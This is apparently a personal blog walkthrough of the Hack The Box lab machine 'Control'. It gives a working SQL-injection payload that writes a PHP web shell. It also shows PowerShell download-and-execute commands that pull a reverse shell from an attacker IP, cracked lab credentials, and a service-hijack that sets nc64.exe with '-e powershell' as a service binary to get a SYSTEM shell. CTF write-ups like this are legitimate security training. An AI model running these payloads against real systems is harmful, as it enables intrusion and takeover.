Control : Hackthebox Walkthrough

Control : Hackthebox Walkthrough

Hey fellas!! This is Shreya Pohekar and today we’ll be walking through Control from Hackthebox. It was a hard windows machine. The initial foothold (wwwroot) to the machine exploited a sql injection, where I uploaded a web shell using the vulnerability. Getting to the user was pretty straightforward as the sqlmap listed password hashes. Privilege escalation to root required us to read through a powershell history file, that retrieved us interesting commands to query registry. The user had full control over the registry services, therefore it can be abused to get an administrator shell.

With all that said, Let’s dive in!!

Start with a nmap scan to find the open ports and services.

# nmap -sC -sV -o control.nmap 10.10.10.167

From the nmap scan, we can conclude that we might get our initial foothold from http.

So let’s jump onto the site, http://10.10.10.167 amd we get a page

There is a login button, but unfortunately, we cant access it. And it says to set up a proxy!!!!

But which IP to forward the request through??

So after viewing the page source of the launcher page, I found this!!

I got the IP to forward the request to. So setup burp and add the X-forwarded for header and the admin.php loads.

Scrolling through the page, option to create products,categories were implemented along with a search bar.

I found out  that there was a SQL injection on the search bar, so I manually formed queries to find out the database, users, number of tables. And got the following result

The database was found to be warehouse and the user was the manager.

Alongside manual enumeration, I copied the request to a file, search.req and started a SQLMap.

# sqlmap -r search.req –all –batch

(–batch automates the yes/no prompt by sqlmap)

And found a lot of juicy stuff such as password to manager, password hash for hector and root.

And few other password hashes

After getting the password for the manager, I tried taking up the remote shells with evil-winrm, psexec.py, but it didn’t worked out. So now we need to somehow upload a shell on the box to get a reverse shell.

I got this blog that totally served the purpose.

But we need to find out where to upload the shell. As we know that the default document root for IIS web server is C:\inetpub\wwwroot, I tried that to upload the shell.

Since burp was continuously generating errors, I manipulated the payload I was using. And finally this payload worked

‘; select “<?php  echo shell_exec($_GET[‘cmd’]);?>” into OUTFILE ‘C:\\inetpub\\wwwroot\\shell.php’;#

The file gets uploaded, still it generates a general error.

Time to take a reverse shell…

I used powercat.ps1 to obtain the reverse shell.

Just add a line to the end of the file, that is gonna execute the script.

Now go to the browser and write a command to grab the powercat.ps1 from the local machine

10.10.10.167/shells.php?cmd=powershell "iex(New-Object Net.WebClient).downloadString('http://10.10.14.81/powercat.ps1');"

Listen on port 443 for incoming connection and also setup a SimpleHTTPServer of python.

As the command on the browser executes, we get a shell.

Now grab winpeas.exe using the command:

WinPEAS did not return any interesting results.

But Alongside, sqlmap was completed and all the results were dumped to file inside /root/.sqlmap

I tried to crack the hashes that i previously obtained of hector and root using hashcat

Hash-identifier gave the following result

# hashcat --example-hashes | grep -i -B2 mysql

In which mode 300 looked similar to what hash-identifier identified

# hashcat --user -m 300 user_hashes /usr/share/wordlists/rockyou.txt --force 

This command can be used if there are more than one password hashes  and the format is :-

User:password_hash

And the password cracked for hector

Now Back to our windows machine, we again take a reverse shell with the creds of hector. This time we are creating a PSCredential which takes in username in plain text and password in encrypted format. This method is useful in the use case of login automation. You can read about PSCredential from here.

# $pass = ConvertTo-SecureString ‘l33th4x0rhector’ -Asplain -Force

# $cred = New-Object System.Management.Automation.PSCredential(‘.\hector’, $pass)

# $cred

The hostname of the machine is Fidelity. Check it out with #hostname

Now set up a python web server and spawn a nc listening on the specified port. The command below gives the reverse shell, but now with hector.

# invoke-command -Computer Fidelity -Credential $cred -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://10.10.14.81/powercat.ps1') }

Now we can grab our user.txt…

NOTE : Rlwrap nc -lnvp can be used in windows machine to get the arrow keys working

So now time to root!

Again I ran winPEAS.exe but didn’t find interesting results. Then got this file : PSReadline.

This is a powershell history file ( similar to bash_history in linux). On listing its contents, I found 2 commands relating to registry.

> get-childitem HKLM:\SYSTEM\CurrentControlset | format-list

The command lists all the services in the registry.

get-childitem HKLM:\SYSTEM\CurrentControlset | format-list


Property  	: {BootDriverFlags, CurrentUser, EarlyStartServices, PreshutdownOrder...}
PSPath    	: Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Control
PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName   : Control
PSDrive   	: HKLM
PSProvider	: Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount   : 121
View      	: Default
Handle    	: Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount	: 11
Name      	: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Control

Property  	: {NextParentID.daba3ff.2, NextParentID.61aaa01.3, NextParentID.1bd7f811.4, NextParentID.2032e665.5...}
PSPath    	: Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Enum
PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName   : Enum
PSDrive   	: HKLM
PSProvider	: Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount   : 17
View      	: Default
Handle    	: Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount	: 27
Name      	: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Enum

Property  	: {}
PSPath    	: Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Hardware Profiles
PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName   : Hardware Profiles
PSDrive   	: HKLM
PSProvider	: Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount   : 3
View      	: Default
Handle    	: Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount	: 0
Name      	: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Hardware Profiles

Property  	: {}
PSPath    	: Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Policies
PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName   : Policies
PSDrive   	: HKLM
PSProvider	: Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount   : 0
View      	: Default
Handle    	: Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount	: 0
Name      	: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Policies

Property  	: {}
PSPath    	: Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services
PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName   : Services
PSDrive   	: HKLM
PSProvider	: Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount   : 667
View      	: Default
Handle    	: Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount	: 0
Name      	: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services

Property  	: {}
PSPath    	: Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Software
PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName   : Software
PSDrive   	: HKLM
PSProvider	: Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount   : 1
View      	: Default
Handle    	: Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount	: 0
Name      	: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Software

The get-acl cmdlet get you the  security descriptor for a resource, such as a file or registry key. The Sddl contains the Access control of the resource.

get-acl HKLM:\SYSTEM\CurrentControlSet | format-list


Path   : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet
Owner  : BUILTIN\Administrators
Group  : NT AUTHORITY\SYSTEM
Access : BUILTIN\Administrators Allow  FullControl
     	NT AUTHORITY\Authenticated Users Allow  ReadKey
     	NT AUTHORITY\Authenticated Users Allow  -2147483648
     	S-1-5-32-549 Allow  ReadKey
     	S-1-5-32-549 Allow  -2147483648
     	BUILTIN\Administrators Allow  FullControl
     	BUILTIN\Administrators Allow  268435456
     	NT AUTHORITY\SYSTEM Allow  FullControl
     	NT AUTHORITY\SYSTEM Allow  268435456
     	CREATOR OWNER Allow  268435456
     	APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  ReadKey
     	APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  -2147483648
     	S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681 Allow  
     	ReadKey
     	S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681 Allow  
     	-2147483648
Audit  :
Sddl   : O:BAG:SYD:AI(A;;KA;;;BA)(A;ID;KR;;;AU)(A;CIIOID;GR;;;AU)(A;ID;KR;;;SO)(A;CIIOID;GR;;;SO)(A;ID;KA;;;BA)(A;CIIOI
     	D;GA;;;BA)(A;ID;KA;;;SY)(A;CIIOID;GA;;;SY)(A;CIIOID;GA;;;CO)(A;ID;KR;;;AC)(A;CIIOID;GR;;;AC)(A;ID;KR;;;S-1-15-
     	3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681)(A;CIIOID;GR;;;S
     	-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681)

Based on the above 2 results, I found out that Hector has full control over registry.

As a note, commands lists SDDL’s. Security Descriptor Definition Language (SDDL) is a formal way to specify Microsoft Windows  security descriptors or text strings that describe who owns various objects such as files in the system. The security descriptor may also provide an ACL for an object or its group.

# $acl = get-acl HKLM:\System\CurrentControlSet\Services

# ConvertFrom-SddlString -Sddl $acl.Sddl -type RegistryRights | Foreach-Object {$_.DiscretionaryAcl}

So that’s a much readable form of hector having full control over the registry services.

# cd HKLM:

# cd SYSTEM\CurrentControlSet\Serivces

We need to find all the services running as LocalSystem, so that we can modify them and get a reverse shell as NT Authority.

The service (running as local system) should have startup type as manual and also we should have the permission to start and stop the service.

Start : 3 (Signifies manual mode)

ImagePath (This is from where the service loads the executables. Therefore we have to bind our shell here)

ObjectName : LocalSystem (advantage of running under the LocalSystem account is that the service has complete unrestricted access to local resources. )

Now, I’ll be sorting the services based upon the above three described parameters.

# cd SYSTEM\CurrentControlSet\Services

# $services = Get-ItemProperty -Path *

# $temp = $services | where { ($_.ObjectName -match ‘LocalSystem’)}

# $temp | select PSChildName | measure

# $temp = $services | where { ($_.ObjectName -match ‘LocalSystem’) -and ($_.Start -match ‘3’) }

# $temp | select PSChildName | measure

So after sorting, I found out that wuauserv (Windows Update Service) is one such service that matches the criteria. So let’s exploit!!

# sc.exe sdshow wuauserv

The images below show the SDDL set upon the wuauserv service, which makes it exploitable.

# ConvertFrom-SddlString -Sddl “D:(A;;CCLCSWRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)” | Foreach-Object {$_.DiscretionaryAcl}
A more readable format that represents the sddl of wuauserv service

Aftering querying the service we find out that it is stopped. That’s what we wanted because Hector dont have the permission to stop the running service. 

Grab the nc64.exe from the local machine and paste it in C:\Windows\System32\spool\drivers\color\nc64.exe

Using:

wget http://10.10.14.81/nc64.exe -o nc64.exe

 > set-itemProperty -path wuauserv -Name ImagePath -Value "C:\Windows\System32\spool\drivers\color\nc64.exe 10.10.14.81 9001 -e powershell"
> get-item wuauserv  (To check that our bind shell properly loaded)
# sc.exe start wuauserv

When we start the service, the binary in the ImagePath gets loaded and executed. In our case, nc.exe gets executed and connects to the listener that was spawned on the local machine using:

# nc -lnvp 9001

Yes it was a long way to go but the reward is worth it!!

That’s all for the blog post. Thanks for reading!!

Until then, Happy Hacking!!

For more such content subscribe to my page.

+8

shreyapohekar

I am Shreya Pohekar. I love to build and break stuff. Currently, I'm working as iOS and angular developer. I am also a contributor to CodeVigilant project. My blogs are focused on Infosec and Dev and its how to's.

Leave a Reply